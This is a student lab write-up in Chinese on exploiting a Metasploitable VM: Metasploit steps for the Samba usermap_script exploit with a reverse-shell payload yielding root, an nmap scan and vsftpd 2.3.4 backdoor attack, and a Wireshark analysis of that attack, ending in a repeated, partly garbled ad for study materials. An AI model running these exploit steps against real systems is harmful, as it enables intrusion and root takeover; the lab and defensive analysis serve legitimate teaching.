①启动Metasploit软件,可根据个人喜好使用msfconsole、msfgui、msfweb之一;
- 在Kali中输入
msfconsole
命令启动Metasploit
②使用exploit:exploit/multi/samba/usermap_script渗透攻击模块
- 先使用
search
命令搜索usermap_script
渗透攻击模块
- 根据搜索结果,输入
use exploit/multi/samba/usermap_script
命令使用该模块
③选择攻击PAYLOAD为远程shell,(正向或反向连接均可)
- 先使用命令
show payloads
查看攻击载荷
- 使用命令
set payload cmd/unix/reverse
将远程Shell作为攻击载荷
④设置渗透攻击参数(RHOST,LHOST,TARGET等)
- 输入命令
show options
显示渗透攻击参数
- 输入
set LHOST 192.168.200.3
将LHOST
设置为攻击机Kali的IP - 输入
set RHOST 192.168.200.123
将RHOST
设置为靶机Metasploitable_ubuntu的IP
- 再次输入命令
show options
显示渗透攻击参数,查看参数是否设置成功
根据显示的参数可知,已设置成功
⑤执行渗透攻击
- 输入命令
exploit
实施攻击
⑥查看是否正确得到远程Shell,并查看获得的权限
- 输入命令
ifconfig
查看IP地址
可知此时的IP地址为192.168.200.123
,确定获得了靶机的Shell,攻击成功 - 再输入
whoami
命令,查看权限
显然,我们获得了root权限
2.2 实践作业:攻防对抗实践
①攻击实验
虚拟机分类 | 虚拟机名称 | IP |
---|---|---|
攻击机(吴锦龙20232803) | Kali | 172.20.10.4 |
靶机(张哲20232807) | Metasploitable_ubuntu | 172.20.10.5 |
- 在Kali中输入命令
sudo nmap -sV 172.20.10.5
使用namp
进行探测
我们可以看到21
号端口上运行的是vsftpd 2.3.4
版本的ftp
服务 - 输入
msfconsole
命令启动Metasploit
- 输入命令
search vsftpd
搜索是否有关于vsftpd
的模块
可以看到图中第二个模块即为vsftpd 2.3.4
版本相应的模块 - 输入命令
use exploit/unix/ftp/vsftpd_234_backdoor
来使用该模块
- 输入命令
show payloads
查看攻击载荷
- 设置攻击载荷
- 输入命令
show options
显示需要设置的参数
- 输入命令
set RHOST 172.20.10.5
将RHOST
设为目标靶机的ip地址
- 输入
show options
检查是否设置成功
- 输入
exploit
实施攻击
- 查看ip,确实为靶机
- 创建一个文件夹
②防御实验
- 在攻击前,打开Kali的Wireshark进行抓包,攻击完成后,在Wireshark中输入
ip.addr == 172.20.10.4
过滤数据包
可以看到,过滤结果中有大量的TCP数据包,并掺杂少量的FTP数据包 - 跟踪TCP流
由上可知攻击者针对vsftpd 2.3.4
进行了攻击
攻击者在拿到终端的权限后,创建了一个文件夹 - 查看靶机,发现存在该文件夹,说明攻击成功
3. 学习中遇到的问题及解决
- 问题描述:使用实验室的网络(连接网线)时,虚拟机没有ipv4的地址,只有ipv6的地址
- 解决方案:不使用实验室的网线,使用手机热点即可
4. 学习感悟、思考等
- 这次实践的第一部分与上一次实践基本类似,只不过上一次是攻击Windows靶机,而这次是攻击Linux靶机。
- 在第二部分攻防对抗实践中:在实施攻击之前,我先对目标靶机进行了扫描,包括端口扫描、服务识别和漏洞扫描,这为后续的攻击提供了关键信息;在被攻击后,我尝试分析wireshark捕获到的数据包,回溯攻击者的攻击路径和行为,这不仅提升了我的网络协议分析能力,也加深了我对网络攻击手法的理解。
最后
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!
由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!
程,基本涵盖了95%以上网络安全知识点!真正的体系化!**
如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!
由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!